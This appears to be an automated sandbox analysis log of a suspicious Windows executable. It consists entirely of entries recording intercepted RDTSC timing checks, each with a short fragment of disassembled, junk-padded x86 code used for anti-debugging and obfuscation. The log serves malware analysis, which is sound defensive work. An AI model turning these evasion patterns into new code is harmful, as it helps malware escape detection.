Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D36D7F second address: D36D98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D36D98 second address: D36D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D36D9C second address: D36DBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA141FCB3h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D37053 second address: D37073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D40D18 second address: D40D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FCBA141FCA8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D40D39 second address: D40D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCBA141C92Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D44AE8 second address: D44AFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FCBA141FCAAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D43F1C second address: D43F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D440AD second address: D440B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C69F second address: D4C6CC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA141C926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FCBA141C93Bh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FCBA141C933h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C6CC second address: D4C6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C6D0 second address: D4C6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C6D4 second address: D4C6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCBA141FCB8h 0x0000000d jc 00007FCBA141FCACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A805 second address: D4A809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A809 second address: D4A82E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAAh 0x00000007 jmp 00007FCBA141FCAAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jp 00007FCBA141FCA6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A82E second address: D4A836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A836 second address: D4A840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A9B0 second address: D4A9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A9B8 second address: D4A9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4A9BE second address: D4AA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCBA141C926h 0x0000000a jnl 00007FCBA141C926h 0x00000010 popad 0x00000011 ja 00007FCBA141C954h 0x00000017 jmp 00007FCBA141C939h 0x0000001c jmp 00007FCBA141C935h 0x00000021 js 00007FCBA141C928h 0x00000027 popad 0x00000028 push ebx 0x00000029 pushad 0x0000002a jmp 00007FCBA141C92Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4AA1E second address: D4AA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4B6ED second address: D4B6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4BDAB second address: D4BDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4BDB1 second address: D4BDBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA141C926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4BDBB second address: D4BDE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBA141FCB3h 0x00000011 jmp 00007FCBA141FCADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C55B second address: D4C56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCBA141C926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C56A second address: D4C56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C56E second address: D4C574 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C574 second address: D4C580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCBA141FCA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D4C580 second address: D4C584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D52E5B second address: D52E80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jg 00007FCBA141FCA6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D52E80 second address: D52EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA141C92Fh 0x00000008 jmp 00007FCBA141C92Bh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D52EA6 second address: D52EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D52EAC second address: D52EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D55F70 second address: D55F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D622AB second address: D622B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D622B0 second address: D622B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D622B5 second address: D622BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D622BD second address: D622C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63DE1 second address: D63DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63DE5 second address: D63DEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63DEB second address: D63DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA141C92Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F52 second address: D63F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F56 second address: D63F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F5A second address: D63F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F60 second address: D63F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F69 second address: D63F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F71 second address: D63F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F7C second address: D63F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F80 second address: D63F95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FCBA141C92Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63F95 second address: D63FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FCBA141FCA6h 0x0000000a jmp 00007FCBA141FCB8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63FB7 second address: D63FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D63FBB second address: D63FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCBA141FCACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6A393 second address: D6A3B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBA141C93Ch 0x00000008 jmp 00007FCBA141C936h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6A3B7 second address: D6A3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6F0B0 second address: D6F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007FCBA141C926h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6F0BF second address: D6F0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCBA141FCA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6F0C9 second address: D6F0D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6F0D3 second address: D6F0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D6F0D9 second address: D6F0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D79D5C second address: D79D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FCBA141FCA6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D79BD6 second address: D79C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA141C92Bh 0x0000000e pushad 0x0000000f jc 00007FCBA141C926h 0x00000015 jmp 00007FCBA141C934h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D79C06 second address: D79C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D79C0C second address: D79C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D7BF3E second address: D7BF4D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCBA141FCA6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D7BF4D second address: D7BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D81216 second address: D81224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FCBA141FCA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D81224 second address: D81228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D81228 second address: D81233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D81233 second address: D81239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D81A4C second address: D81A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D824C0 second address: D824E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C935h 0x00000009 jmp 00007FCBA141C92Bh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86CA2 second address: D86CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86DF7 second address: D86DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86DFF second address: D86E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FCBA141FCA6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86E12 second address: D86E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86E18 second address: D86E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86E1C second address: D86E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FCBA141C926h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D86E2C second address: D86E36 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBA141FCA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D887EE second address: D887F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D887F9 second address: D88802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D88802 second address: D8880D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D8880D second address: D88813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D8B9F7 second address: D8BA0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C931h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: DCC726 second address: DCC72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: DCC72C second address: DCC731 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: DD850C second address: DD8526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: DD8526 second address: DD854E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C935h 0x00000007 jmp 00007FCBA141C92Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA7936 second address: EA793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA793B second address: EA796C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA141C930h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA796C second address: EA797E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA141FCA6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA797E second address: EA799A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EAC4C4 second address: EAC563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FCBA141FCA8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push ebx 0x00000027 mov dx, di 0x0000002a pop edx 0x0000002b xor edx, 31337F76h 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FCBA141FCA8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov edx, 0744A953h 0x00000052 call 00007FCBA141FCA9h 0x00000057 jmp 00007FCBA141FCB0h 0x0000005c push eax 0x0000005d jmp 00007FCBA141FCABh 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b jbe 00007FCBA141FCA6h 0x00000071 popad 0x00000072 rdtsc
